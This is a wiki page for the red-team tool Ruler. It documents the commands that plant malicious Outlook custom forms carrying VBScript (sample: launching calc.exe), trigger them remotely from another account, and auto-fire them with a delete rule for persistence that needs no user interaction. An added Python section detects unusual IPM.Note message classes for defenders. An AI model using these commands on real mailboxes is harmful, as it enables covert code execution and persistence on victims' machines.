Etienne Stalmans edited this page May 11, 2017 · 6 revisions

Forms

Ruler can also get shell through custom forms. This is especially useful for persistence, as a form can lie dormant in the inbox, nearly undetectable.

The basic premise behind forms is explained in "Outlook forms and shells".

To access the Forms option, you need to use the form command. There are multiple sub-commands to forms:

Setup

If you use the forms attack, you need to ensure that the templates folder is present in the current working directory. Ruler will need the files contained in this directory. Please copy the following files into it:

  • img0.bin
  • img1.bin
  • formstemplate.bin
  • formsdeletetemplate.bin

Display

You can view all existing forms using the display command. This fetches the list of existing forms from the Exchange server and provides you with the full form name.

./ruler --email john@msf.com form display

Add

Unlike Rules, forms don't require a WebDAV instance, and VBScript can be executed directly. A sample VBScript entry would be:

CreateObject("Wscript.Shell").Run "calc.exe", 0, False

The script needs to be supplied in either a file, or on the command line. To create a custom form:

./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --send

This will create a new form of message class IPM.Note.superduper and use the script found in /tmp/command.txt as the VBScript to execute. Using --send simply tasks Ruler to send an email to the user, using their own account, and ensures the correct message class is set (which triggers the form).

To trigger an existing form, you don't need to send the email from the account that the form was created on. This is great for persistence: you simply need to have a valid Exchange-based account (outlook.com is great) and know the suffix used for the form.

./ruler --email alice@outlook.com form send --target john@msf.com --suffix superduper
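
For defenders, the custom message class is the observable a published form leaves behind. The following is an added example (not part of Ruler or the original wiki) that flags IPM.Note.<suffix> items whose class is not on an allowlist; the CSV export layout and the allowlist contents are assumptions, and the sample rows are constructed.

```python
import csv
import io
from collections import Counter

# Assumption: a partial allowlist of IPM.Note subclasses used by Outlook and
# Exchange themselves; extend it with classes from add-ins you actually run.
KNOWN_SUBCLASSES = (
    "ipm.note.smime",
    "ipm.note.secure",
    "ipm.note.rules",
    "ipm.note.microsoft",
    "ipm.note.storagequotawarning",
)

def is_custom_note_class(message_class: str) -> bool:
    """True for IPM.Note.<suffix> classes that are not on the allowlist."""
    # Compare lower-cased so case variants cannot slip past the allowlist.
    mc = message_class.strip().lower()
    if not mc.startswith("ipm.note."):
        return False  # plain IPM.Note and non-mail item types are out of scope
    # Match whole dot-separated segments, so "smimeX" is not treated as "smime".
    return not any(mc == k or mc.startswith(k + ".") for k in KNOWN_SUBCLASSES)

def find_custom_forms(export_csv: str) -> dict:
    """Return {(mailbox, message_class): item count} for unrecognised classes."""
    hits = Counter()
    for row in csv.DictReader(io.StringIO(export_csv)):
        if is_custom_note_class(row["message_class"]):
            hits[(row["mailbox"], row["message_class"].strip())] += 1
    return dict(hits)

# Constructed sample export (hypothetical column layout, not real data).
SAMPLE = """mailbox,folder,message_class
john@msf.com,Inbox,IPM.Note
john@msf.com,Inbox,IPM.Note.SMIME.MultipartSigned
john@msf.com,Inbox,IPM.Note.superduper
john@msf.com,Deleted Items,IPM.Note.superduper
john@msf.com,Calendar,IPM.Appointment
john@msf.com,Inbox,IPM.Note.Rules.OofTemplate.Microsoft
"""

if __name__ == "__main__":
    for (mailbox, cls), count in sorted(find_custom_forms(SAMPLE).items()):
        print(f"{mailbox}: {count} item(s) with unrecognised class {cls}")
```

Any hit is a lead for review rather than a verdict, since legitimate add-ins also register their own message classes.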

Trigger Form with a Rule

Nick Landers (@monoxgas) found that a form without event triggers would call the VBScript payload on delete. This delete can be automated by creating a client-side rule to delete the message as it arrives in the mailbox.

This is a great way to auto-trigger the form, without requiring any user interaction. Ruler can automate this for you if you supply the --rule flag:

./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --rule --send

You will need to delete the newly created rule once your payload has triggered. This can be done using the delete command outlined in Rules.

Delete

Deleting an existing form is done in a similar way to deleting rules.

./ruler --email john@msf.com form delete --suffix superduper

If the form has a rule associated with it (you used --rule when creating the form), Ruler will detect the rule and offer to delete it for you.
